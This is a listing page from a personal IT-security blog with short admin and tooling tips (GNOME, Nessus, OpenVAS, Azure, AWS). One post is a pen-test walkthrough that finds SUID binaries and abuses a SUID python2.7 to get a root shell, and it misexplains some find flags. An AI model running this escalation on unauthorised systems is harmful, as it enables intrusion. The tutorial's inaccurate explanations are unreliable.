kevindicks.co.uk

November 23, 2019

Clicking on Places in Linux displays CHIRPS message

When clicking on Places in Linux, a message is displayed advising of disabling error reporting under a CHIRPS message. This can be a result of a corrupted file manager within the GNOME Desktop configuration, i.e. uninstalled file manager dependencies during a previously issued apt-get autoremove or equivalent command.

To fix this issue, you will need to reinstall the GNOME file manager packages in Linux:

1. Download the lib files for GNOME desktop:
wget http://ftp.br.debian.org/debian/pool/main/g/gnome-desktop3/libgnome-desktop-3-18_3.34.1-1_amd64.deb

2. Download the data files for GNOME desktop:
wget http://ftp.br.debian.org/debian/pool/main/g/gnome-desktop3/gnome-desktop3-data_3.34.1-1_all.deb

3. Install GNOME data files package:
dpkg -i gnome-desktop3-data_3.34.1-1_all.deb

4. Install GNOME lib files package:
dpkg -i libgnome-desktop-3-18_3.34.1-1_amd64.deb

5. Install Nautilus file manager with apt:
apt install nautilus

With file manager now installed, clicking on Places should now result in the correct action.

November 23, 2019

Netdiscover running on NAT interface not finding IP addresses on host-only network

Netdiscover commonly found as an application within Kali Linux can in certain circumstances, fail to scan and list IP address on your local area network (LAN), especially if you are running the Netdiscover tool within a virtualised environment using NAT as as the network adaptor connection.

Netdiscover uses Address Resolution Protocol (ARP), which assigns IP addresses to MAC addresses. ARP by design will not cross network boundaries that are segregated by layer 3 routing or switch virtual interfaces (SVI) running at layer 3, as ARP packets will not be forwarded on by these layer 3 devices.

For Netdiscover to work, you will need to configure your virtualised environment to use Bridged network adaptor connection to be directly connected to your connect. This will enable ARP packets to be sent beyond the local virtualised network boundaries.

To configure Bridged networking configuration for your environment, please consult your software’s documentation.

November 23, 2019November 23, 2019

DISA SRG/STIG Library

The DISA SRG/STIG Library can be used during static analysis of security architecture and system design reviews. The SRG/STIG Library is also used as a reference guide during design assurance activities, to ensure system configuration is assured using industry good practices.

Link: DISA SRG/STIG Library

The SRG/STIG Library can also be accessed using a STIG viewer – stigviewer.com

November 23, 2019

Nessus has detected that API access on this scanner is disabled.

Nessus displays warning “Nessus has detected that API access on this scanner is disabled” during usage.

To fix this issue, the Nessus service must be stopped, the configuration reset, Nessus restarted and then registered using your previous registration key.

1. Stop the Nessus service:
service nessusd stop

2. Reset the configuration:
/opt/nessus/sbin/nessuscli fix --reset

3. Start the Nessus service:
service nessusd start

4. Register Nessus using your previous registration key:
/opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx-xxxx


5. Login to Nessus to update plugins.




		
		Posted on May 4, 2019
How to Install Azure PowerShell Module
	


	
	
		To install Azure PowerShell Module, please follow the below steps:
1. Open Windows PowerShell from your system, using the Run as administrator option.
2. From within the PowerShell command window, enter the following command:
Install-Module AzureRM -AllowClobber
3. Import the AzureRM module within PowerShell, using the following command:
Import-Module AzureRM
4. Validate the AzureRM module is installed properly, by using the following command:
Get-Module -Listavailable AzureRM
If AzureRM module has been successfully installed, you should see output within PowerShell that looks similar to below:
PS C:\WINDOWS\system32> Get-Module -Listavailable AzureRM

    Directory: C:\Program Files\WindowsPowerShell\Modules
ModuleType Version    Name                                ExportedCommands

---------- -------    ----                                ----------------

Script     6.13.1     AzureRM
	


	



		
		Posted on November 4, 2018
OpenVAS Administrator Password Reset
	


	
	
		To reset the admin password (Administrator) for OpenVAS, the following command can be used to reset the password:
openvasmd --user=admin --new-password=admin_password
Alternatively, you can use this command to create additional users:
openvasmd --user=new_user--new-password=user_password
	


	



		
		Posted on September 22, 2018September 22, 2018
Searching for binaries for privilege escalation exploit
	


	
	
		During the attacking phase of a pen test once access has been gained to a shell, we can try to own the system through a privilege escalation exploit in order to obtain root access. We can verify the system identification of the user by using the following command to ascertain SUID permissions:
$ id

uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)


Then we can use the following command, to find a list of executable file SUID permissions on the system:
find / -perm -u=s -type f 2>/dev/null
Here, the find command will search from root (/) looking for user SUID permissions configured to execute (-perm -u=s), and to find directories (-type f). The result of this search, will be redirected to standard error and use a null device to suppress output (2>/dev/null). 
Example show below:
$ find / -perm -u=s 2>/dev/null

/sbin/mount.nfs

/usr/sbin/exim4

/usr/lib/eject/dmcrypt-get-device

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/openssh/ssh-keysign

/usr/bin/gpasswd

/usr/bin/newgrp

/usr/bin/python2.7

/usr/bin/chsh

/usr/bin/at

/usr/bin/mawk

/usr/bin/chfn

/usr/bin/procmail

/usr/bin/passwd

/bin/su

/bin/umount

/bin/mount


Note that if redirect to stdout (>) or (1>) was used instead of stderr (2>), we would see a list of permission denied errors. As given from the above example, we could look to use Python2.7 binary in an attempt to gain root access using a privilege escalation exploit. We can use the following command to achieve this in using our above example:
/usr/bin/python2.7 -c ‘import pty;pty.spawn(“/bin/sh”)’
This command will get a TTY shell after a reverse shell connection using Python2.7. This should result in the system permitting root access, and this can be seen from the following commands:
# id

uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

# whoami

root


We can see that the system user now has root access, denoted from the above by euid=0(root) and root identified from whoami command.
	


	



		
		Posted on September 14, 2018
Amazon AWS VPC Components
	


	
	
		Amazon AWS VPC consists of the following components:

Internet Gateways or Virtual Private Gateways (note that a VPC can have only one internet gateway)
Route Tables
Network Access Control lists (NACLs), applied at the subnet level and is stateless
Security Groups, applied at the instance level and is stateful
VPC traffic can be logged via Flowlogs

	


	



		
		Posted on September 12, 2018
Example bash script for cloud environments
	


	
	
		The following bash script example, is a script which can be used to automate some basic tasks, associated with setting up a virtual resource, such as an Amazon AWS EC2 instance:
#!/bin/bash

yum update -y

yum install httpd -y

service httpd start

chkconfig httpd on

aws s3 cp s3:///index.html /var/www/html/
What this bash script will perform on your behalf, will update the instance repositories (yum update), and also install Apache web server (install httpd). This particular script was used in Amazon AWS for an EC2 instance and a static website hosted on a S3 bucket storage resource.
The script will also ensure that the Apache web server will persist during system reboots (chkconfig), and the last instruction, will copy the contents between locations. 
	


	



		
		Posted on September 12, 2018
List of Tenable Nessus plugins
	


	
	
		AIX Local Security Checks

Amazon Linux Local Security Checks

Backdoors

Brute force attacks

CentOS Local Security Checks

CGI abuses

CGI abuses : XSS

CISCO

Databases

Debian Local Security Checks

Default Unix Accounts

Denial of Service

DNS

F5 Networks Local Security Checks

Fedora Local Security Checks

Firewalls

FreeBSD Local Security Checks

FTP

Gain a shell remotely

General

Gentoo Local Security Checks

HP-UX Local Security Checks

Huawei Local Security Checks

Incident Response

Junos Local Security Checks

MacOS X Local Security Checks

Mandriva Local Security Checks

Misc.

Netware

Oracle Linux Local Security Checks

OracleVM Local Security Checks

Palo Alto Local Security Checks

Peer-To-Peer File Sharing

PhotonOS Local Security Checks

Red Hat Local Security Checks

RPC

SCADA

Scientific Linux Local Security Checks

Service detection

Settings

Slackware Local Security Checks

SMTP problems

SNMP

Solaris Local Security Checks

SuSE Local Security Checks

Ubuntu Local Security Checks

Virtuozzo Local Security Checks

VMware ESX Local Security Checks

Web Servers

Windows

Windows : Microsoft Bulletins

Windows : User management
	


	


	
		Posts navigation
		Previous page
Page 1
Page 2
Page 3
…
Page 11
Next page